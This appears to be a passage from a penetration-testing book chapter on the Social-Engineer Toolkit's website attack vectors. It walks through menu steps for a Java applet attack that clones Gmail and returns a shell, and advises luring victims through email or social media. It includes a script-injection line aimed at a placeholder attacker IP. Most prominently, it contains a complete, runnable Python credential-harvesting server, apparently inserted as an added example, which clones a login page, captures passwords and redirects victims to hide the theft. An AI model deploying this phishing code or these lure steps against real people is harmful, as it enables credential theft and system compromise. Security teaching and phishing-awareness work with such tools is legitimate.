
The Social-Engineer Toolkit (SET), created by Dave Kennedy, is the world’s premier framework for leveraging social engineering attacks to totally compromise systems. The name of the framework actually doesn’t do it justice, as SET is much more than a spoofed email or malicious PDF creator. It includes some very advanced functionality that allows fully patched computers to be compromised. It doesn’t matter what operating system, browser, software, or firewall is installed: SET’s attacks target the user rather than a software flaw, so patch levels and perimeter defenses do little to stop them. It’s truly an epic attacking framework that even ties directly into the Metasploit attack framework. SET is very easy to use and is included in the latest version of BackTrack. You can get to the SET directory by executing the cd /pentest/exploits/set command in a terminal window.

You can then run SET by issuing the ./set command. Once the framework loads, you will be prompted to agree to the terms of service (select “y” for “yes”) and to allow automatic updates from the Git repository (select “1” to allow updates). Once the update is complete, the main SET menu will appear as shown in Figure 6.15.

FIGURE 6.15 Welcome menu for the Social-Engineer Toolkit (SET).

You can also download the latest version of SET onto any Linux distribution by checking it out with the following terminal command.

git clone https://github.com/trustedsec/social-engineer-toolkit/ set

When you select option #1 to get into the social engineering attacks, you have several attack vectors available to choose from, but you should focus on #2, the website attack vectors, for now. There are six different attack vectors specific to websites that you can select from, and this list grows with every new release of SET!

■ The Java Applet Attack method will spoof a Java certificate and deliver a Metasploit-based payload. It uses a customized Java applet created by Thomas Werth to deliver the payload.

■ The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iFrame and deliver a Metasploit payload.

■ The Credential Harvester method will utilize web cloning of a web site that has a username and password field and harvest all the information posted to the website.

■ The TabNabbing method will wait for a user to move to a different tab in their browser, and then refresh the page to something different.

■ The Man Left in the Middle Attack method was introduced by Kos and utilizes the HTTP REFERER header in order to intercept fields and harvest data from them. You need an already vulnerable site into which you can inject <script src="http://YOURIP/">. This could either be a compromised site or an injection point found through XSS.

■ The Web-Jacking Attack method was introduced by white_sheep, Emgent, and the Back|Track team. This method utilizes iFrame replacements to make the highlighted URL link appear legitimate; however, when it is clicked, a window pops up and is then replaced with the malicious link.

■ If the link replacement is too slow or too fast, you can adjust its timing in the set_config file.

There is also the ability to use several of these attack vectors together with the #7 Multi-Attack Web method. This allows you to chain several of these methods together into a single attack. For example, you could use the Java applet attack to land a shell on the victim’s machine, coupled with the credential harvester to steal the authentication credentials from that same victim when they attempt to log in to the spoofed site you’ve created.
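The Credential Harvester and Site Cloner described above are, underneath, a small web server that serves a rewritten copy of a login page and records whatever gets posted to it. The following is an added example of that mechanism, written here for this page in Python (SET’s own language) and not taken from SET itself. The login page, the example.com hostnames and the field names are constructed stand-ins; the 172.16.69.134 address is the attacker machine this chapter uses.

```python
"""Credential harvester with site cloning, in the style of SET's
Credential Harvester / Site Cloner vectors. Added example, not SET's code.

Offline demo: FETCHED_PAGE is a constructed stand-in (assumption) for what
the Site Cloner would download. clone_page() rewrites it so assets still
load from the real site while every form posts to us; harvest() pulls the
interesting fields out of the victim's POST body; the handler then bounces
the victim to the genuine site, so the attempt looks like one mistyped
password.
"""
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urljoin

ORIGINAL_URL = "https://login.example.com/ServiceLogin"   # assumed target site
HARVESTER_URL = "http://172.16.69.134/"                   # attacker box from the text

# Constructed stand-in for the cloned page (not a real Gmail page).
FETCHED_PAGE = """<html><head><link rel="stylesheet" href="/static/login.css"></head>
<body><img src="img/logo.png">
<form id="gaia_loginform" action="/ServiceLoginAuth" method="post">
  <input type="hidden" name="continue" value="https://mail.example.com/">
  <input type="email" name="Email">
  <input type="password" name="Passwd">
  <input type="submit" value="Sign in">
</form></body></html>"""

CREDENTIAL_HINTS = ("pass", "pwd", "email", "user", "login")
HARVESTED = []   # one dict per POST, in the order the victims submitted


def clone_page(html, original_url, harvester_url):
    """Make a fetched page serve from the attacker host while looking intact.

    1. href/src values are made absolute against the original URL so the
       browser still pulls the real stylesheets and images.
    2. Every <form action="..."> is pointed at the harvester.
    """
    def absolutize(m):
        return '%s="%s"' % (m.group(1), urljoin(original_url, m.group(2)))
    html = re.sub(r'\b(href|src)="([^"]*)"', absolutize, html)
    html = re.sub(r'(<form\b[^>]*?)\saction="[^"]*"',
                  lambda m: '%s action="%s"' % (m.group(1), harvester_url), html)
    return html


def harvest(body):
    """Return the posted fields whose names look like credentials."""
    fields = parse_qs(body, keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()
            if any(hint in name.lower() for hint in CREDENTIAL_HINTS)}


class HarvesterHandler(BaseHTTPRequestHandler):
    page = clone_page(FETCHED_PAGE, ORIGINAL_URL, HARVESTER_URL).encode()

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(self.page)))
        self.end_headers()
        self.wfile.write(self.page)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length).decode("utf-8", "replace")
        HARVESTED.append(harvest(body))
        # Redirect to the real site: the victim lands on the genuine login
        # page and assumes the first attempt was a typo.
        self.send_response(302)
        self.send_header("Location", ORIGINAL_URL)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass   # keep the terminal clean; HARVESTED is the record


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), HarvesterHandler).serve_forever()
```

Two defensive tells fall out of this design: because the stylesheets and images still load from the genuine site, that site’s web server logs show asset requests carrying a Referer header from an unfamiliar host, and the victim’s browser shows a plain http:// URL on a bare IP address instead of the real domain over TLS. Both are worth checking for when you suspect a cloned login page.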

In order for SET to work properly, you have to set the IP address where SET will run its web server for the cloned website. This is the IP address that will be passed to the victim machine. Because we are already running Apache for our DVWA environment, we can’t run SET at the same time without disabling Apache, so stopping the Apache service is one option. You can also just start up another VM and run SET on that (which is what will be done for this example). This two-VM approach gives a more realistic hacker-versus-victim feel to these web user attack exercises. It is the same two-machine setup you could have used for the web server hacking steps in Chapter 2.

You have already drilled down into the website attack vectors menu in SET by following the steps above, so now it’s time to configure a viable attack. Assume the victim machine is at IP address 172.16.69.135 and the attacker machine is at IP address 172.16.69.134. Setting up a Java Applet attack via SET’s menu commands can be completed with the following steps:

1. Choose 1 for the Java Applet Attack method

2. Choose 2 for Site Cloner

3. Choose “n” for “no” to “Are you using NAT/Port Forwarding [yes|no]”

4. Provide https://gmail.com for the site to clone

5. Choose 11 for the SE Toolkit Interactive Shell (this is a custom shell similar to Metasploit’s Meterpreter)

6. Provide 443 as the listener port

If you successfully complete these steps, you will receive a confirmation message that says “The Social-Engineer Toolkit (SET) is listening on 0.0.0.0:443”. The work from the attacker’s perspective is done!

All you need to do now is convince your victim to visit the SET web server running on 172.16.69.134. This is where the pure social engineering that we discussed earlier comes into play, such as an email link, instant message, forum post, Facebook post, Twitter, and countless other ways to deliver it.

From the victim’s perspective, when they visit the IP address (which could also be a snazzy URL if you want to host that) they are met with a website that looks just like Gmail and a prompt to allow a Java applet to be installed and run. Once the victim has visited the fake Gmail site and accepted the applet, a session is opened on the victim’s machine and sent back to the attacker. You will see a notification in your SET terminal and you can issue the sessions -l command (that’s a lowercase L) to see the listing. You can interact with the first session by issuing the sessions -i 1 command (that’s a lowercase I and the #1). You now have a shell prompt on that victim machine and have effectively bypassed the defensive countermeasures installed on it. Note that nothing was exploited here: the shell exists because the user clicked through the applet warning, which is why Java security settings that refuse to run self-signed applets stop this vector cold.

And that’s it! It’s that easy! You should dig into more of SET at the official homepage at http://www.trustedsec.com/downloads/social-engineer-toolkit/. One more tip to remember when using SET or attempting any social engineering attack: it’s pretty much a one-time deal. You don’t get to re-send the email or get a re-do with the potential victim. I attended a SET training with Dave Kennedy and we all got a laugh at this notion when we referenced Eminem’s lyrics from Lose Yourself: “You only get one shot, do not miss your chance to blow. This opportunity comes once in a lifetime, yo…”
